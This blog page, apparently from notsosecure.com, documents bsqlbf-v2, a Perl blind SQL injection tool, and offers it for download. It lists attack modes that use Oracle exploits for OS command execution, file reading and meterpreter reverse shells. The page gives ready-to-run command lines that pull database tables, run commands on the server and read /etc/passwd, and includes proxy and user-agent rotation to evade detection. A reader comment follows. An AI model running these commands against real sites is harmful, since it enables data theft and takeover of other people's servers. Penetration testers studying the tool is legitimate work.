This is a modified version of 'bsqlbfv1.2-th.pl'. This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
The tool supports 8 attack modes(-type switch):-
Type 0: Blind SQL Injection based on true and false conditions returned by back-end server
Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.
Type 2: Blind SQL Injection in "order by" and "group by".
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)
Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)
Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs
-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe firstType 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions
-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first
For Type 4(O.S code execution) the following methods are supported:
-stype: How you want to execute command:
SType 0 (default) is based on java..will NOT work against XE.
SType 1 is against oracle 9 with plsql_native_make_utility.
SType 2 is against oracle 10 with dbms_scheduler.Download -
bsqlbf-v2-7.pl
Download other versions from here -
http://code.google.com/p/bsqlbf-v2/downloads/list
Usage example:
$./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"
User Interface:
ubuntu@ubuntu:~$ ./bsqlbf-v2-3.pl// Blind SQL injection brute forcer \\ //originally written by...aramosf@514.es \\ // mofified by sid-at-notsosecure.com \\ // http://www.notsosecure.com \\ ---------------------usage:-------------------------------------------Integer based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=1000 (options) String Based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=bar' (options) ------------------------------------options:-------------------------- -sql: valid SQL syntax to get; version(), database(), (select table_name from inforamtion_schema.tables limit 1 offset 0) -get: If MySQL user is root, supply word readable file name -blind: parameter to inject sql. Default is last value of url -match: *RECOMMENDED* string to match in valid query, Default is auto -start: if you know the beginning of the string, use it. -length: maximum length of value. Default is 32. -time: timer options: 0: dont wait. Default option. 1: wait 15 seconds 2: wait 5 minutes-type: Type of injection: 0: Type 0 (default) is blind injection based on True and False responses 1: Type 1 is blind injection based on True and Error responses 2: Type 2 is injection in order by and group by 3: Type 3 !!New!! is extracting data with SYS privileges (ORACLE dbms_export_extension exploit) 4: Type 4 !!New!! is O.S code execution (ORACLE dbms_export_extension exploit) 5: Type 5 !!New!! is reading files (ORACLE dbms_export_extension exploit, based on java)-file: File to read (default C:\boot.ini)-stype: How you want to execute command: 0: SType 0 (default) is based on java..will NOT work against XE 1: SType 1 is against oracle 9 with plsql_native_make_utility 2: SType 2 is against oracle 10 with dbms_scheduler -database: Backend database: 0: MS-SQL (Default) 1: MYSQL 2: POSTGRES 3: ORACLE -rtime: wait random seconds, for example: "10-20". -method: http method to use; get or post. Default is GET. -cmd: command to execute(type 4 only). Default is "ping 127.0.0.1." -uagent: http UserAgent header to use. Default is bsqlbf 2.3 -ruagent: file with random http UserAgent header to use. -cookie: http cookie header to use -rproxy: use random http proxy from file list. -proxy: use proxy http. Syntax -proxy=http://proxy:port/ -proxy_user: proxy http user -proxy_pass: proxy http password---------------------------- examples:------------------------------- bash# ./bsqlbf-v2-3.pl -url http://www.somehost.com/blah.php?u=5 -blind u -sql "select table_name from imformation_schema.tables limit 1 offset 0" -database 1 -type 1bash# ./bsqlbf-v2-3.pl -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get "/etc/passwd" -match "foo"
THanks - very nice script! Another helpful article on blind sql injection:
ReplyDeletehttp://www.programmerinterview.com/index.php/database-sql/blind-sql-injection/